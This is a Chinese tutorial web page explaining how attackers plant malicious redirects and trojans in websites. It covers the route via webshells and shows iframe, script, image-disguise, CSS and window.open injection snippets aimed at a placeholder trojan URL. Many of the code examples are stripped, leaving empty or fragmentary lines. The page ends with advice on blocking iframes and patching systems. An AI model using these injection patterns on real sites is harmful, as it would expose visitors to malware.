网站首页 > 教程分享 正文
所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据"库备份/恢复"或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。下面就让我们来看看几种常见的挂马网站。
(1)iframe 框架挂马
在网页上增加一行挂马的程序,例如:
这种嵌入是的挂马非常常见,在Google中搜索发现的可能还有木马的网页,一般都是被这种方式挂马。这行语句就是在网页打开的时候,同时打开另外一个网页,当然这个网页可能包含大量的木马,也可能仅仅是为了骗取流量。
如果我们的网页不使用iframe,我们可以屏蔽iframe属性,这样,即使网页被iframe挂马,也不会伤害到访问网站的用户。
【原理】:
IE5及其以后版本支持在CSS中使用expression,用来把CSS属性和javascript脚本关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。
我们在网页中增加如下的代码即可屏蔽iframe属性:
iframe{a:expression(this.src=’about:blank’,this.outerHTML=”);}
iframe 也可以采用加密的方式挂马,例如下面的代码:
(2)script 挂马
通过script的调用来挂马,可以挂直接的html文件,也可以挂js文件,可以明文挂马,为了躲避追查,也有加密挂马的形式,形式各异,千差万别,主要方式如下:
这是一个加密的挂马语句;
2.1 htm文件挂马:
通过上传一个木马文件(x.htm)挂马,代码如下:
document.write(“
”)
document.write(“”)
document.write(“”)
htm 挂马代码:
2.2 js文件挂马
通过上传一个木马文件(x.js)挂马,代码如下:
document.write(“”);
JS挂马代码:
当然也可以挂互联网上任何一台机器的x.js文件;
2.3 js变形加密
(3)图片伪装挂马
随着防毒技术的发展,图片木马技术逃避杀毒监视的新技术,攻击者将类似:http://www.xxx.com/x.htm中的木马代码植入到x.gif图片文
件中,这些嵌入代码的图片都可以用工具生成。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:
当用户打开http://www.x.com/x.htm是,显示给用户的是http://www.x.com/x.jpg,而http://www.x.com/x.htm网页代码也随之运行。
(4)其它的挂马方式
4.1 body挂马
也可以在css的body中挂马
body {
background-image: url(‘javascript:document.write(“”)’)}
4.2 隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML +
‘ ’;
4.3 java的open函数挂马
直接调用:
window.open (“x.htm”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1″);
欺骗调用:
页面要显示的内容
function www_a_com ()
{
var url=”网马地址”;
open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w
idth=800,height=600,left=10,top=10″);
}
4.4 伪装调用:
形形色色的网页挂马,代码都十分简单,所以,互联网木马想要传播,就会不停的开发新的挂马方式,不停的加密隐藏自己,这样才能逃过各种安全软件的眼睛。其实,看看上文,很多语句都是编程常用的代码,只是使用的目的不一样罢了,了解了网页挂马的原理和方法,再防范网页挂马就容易多了。
带木马的网页主要包括两种类型:一种自己本身就是木马网站,所有的页面都有木马,另一种是正常的网站,由于管理不善,被挂马,成为木马网站的一个中转站,看看google中这样的网站何其多,可能很多站长现在还不知道,呵呵,多学习学习吧,站长可不是那么好当的。
不过,仅仅有了网络挂马的代码,也不一定一定能传播木马,只要我们加强防范,不让我们的网页被 挂马,甚至,即使被挂马了,打开了木马网页,我们的系统没有漏洞,木马网页也同样不能发挥作用的。所以,最重要的安全防范方式就是定期给系统打补丁,几乎 所有的木马网页都无法发挥作用了。
猜你喜欢
- 2024-10-10 快速了解JavaScript富文本编辑(javascript富文本编辑器)
- 2024-10-10 PHP面试题—第四回(php面试常见问题)
- 2024-10-10 页面嵌套iframe局部赋值(iframe嵌套页面vue)
- 2024-10-10 再不用怕Markdown中的绘图,GitHub官方支持Mermaid图表绘制工具
- 2024-10-10 「网络安全」常见攻击篇(20)——点击劫持
- 2024-10-10 iframe之间的消息通信(iframe页面通信)
- 2024-10-10 JavaScript 对象 实例(javascript对象的常用方法)
- 2024-10-10 Chrome 现已支持延迟加载网页中的 iframe,速度翻倍提升
- 2024-10-10 Python+selenium自动化测试之iframe嵌套定位
- 2024-10-10 前端开发必读!7个HTML属性助你提升用户体验
你 发表评论:
欢迎- 最近发表
-
- 免费10年VPS-serv00服务器,注册与自动化保号
- Consul微服务注册中心使用指南
- 谷歌云代理商:注册谷歌云服务器需要准备哪些资料?
- steam账号注册不了/注册失败?好用的解决方法看这里
- 微服务架构中的服务注册与发现有哪些?Zookeeper、Eu
- # 从浅入深 学习 SpringCloud 微服务架构(三)注册中心 Eureka(1)
- 一文深入理解AP架构Nacos注册原理
- 群晖NAS本地搭建NVIDIA v-GPU License Server 授权许可服务器的教程
- IDEA 2024解决We could not validate your license XX
- 保障数据完整性:深入解析Oracle数据库的主键和外键约束
- 标签列表
-
- css导航条 (66)
- sqlinsert (63)
- js提交表单 (60)
- param (62)
- parentelement (65)
- jquery分享 (62)
- check约束 (64)
- curl_init (68)
- sql if语句 (69)
- import (66)
- chmod文件夹 (71)
- clearinterval (71)
- pythonrange (62)
- 数组长度 (61)
- javafx (59)
- 全局消息钩子 (64)
- sort排序 (62)
- jdbc (69)
- php网页源码 (59)
- assert h (69)
- httpclientjar (60)
- postgresql conf (59)
- winform开发 (59)
- mysql数字类型 (71)
- drawimage (61)
本文暂时没有评论,来添加一个吧(●'◡'●)